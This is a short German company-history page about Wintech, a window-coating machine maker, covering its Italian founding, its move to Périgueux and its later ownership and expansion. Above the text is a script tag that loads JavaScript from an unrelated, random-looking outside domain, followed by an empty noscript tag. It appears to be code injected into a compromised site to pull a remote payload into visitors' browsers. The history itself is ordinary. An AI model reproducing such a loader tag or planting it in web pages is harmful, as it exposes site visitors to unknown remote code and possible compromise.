<script type="text/javascript" src="http://www.alga9frog.com/js/162003.js" ></script> <noscript></noscript>

Geschichte von Wintech

Wintech France SAS wurde am Stadtrand von Périgueux (Dordogne) im Jahr 2003 kreiert und installiert. Die im Jahr 1998 in Italien in Rovereto (Trentino) gegründete Marke Wintech, hatte bereits Beifall gewonnen in Italien, aber auch in der Schweiz, in Deutschland und in Frankreich.

Michel Cournarie „verlagert“ Wintech von Italien nach Frankreich, und trägt zur Expansion des Unternehmens in Frankreich durch seine zahlreichen Kontakte in der Holzbearbeitungsmaschinen- und Holzfensterfertigungsindustrie bei. Er entwickelt die Versiegelungsmaschine weiter, um sie mehr auf die sich ändernden Anforderungen der Fensterhersteller anzupassen, die zu dickeren, schwereren und größeren Holzelementen tendieren, was die Markenbekanntheit weiter verstärkt. So ist die berühmte V13-Version der Maschine geboren, die zu ihrem Markterfolg beiträgt.

Da der Ruhestand nah war, verkauft Michel Cournarie das Unternehmen im Jahr 2013 an Jérôme Marchadier, dessen internationale Erfahrung die Entwicklung außerhalb Frankreichs schickt, zu neuen, vielversprechenden Märkten, die auf der Suche nach automatisierten Beschichtungslösungen sind: Großbritannien, Nordamerika, Deutschland, Österreich, Schweiz, Dänemark, Benelux. Die Maschine M9C entwickelt sich weiter, um immer näher an den Bedürfnissen der Betreiber zu sein.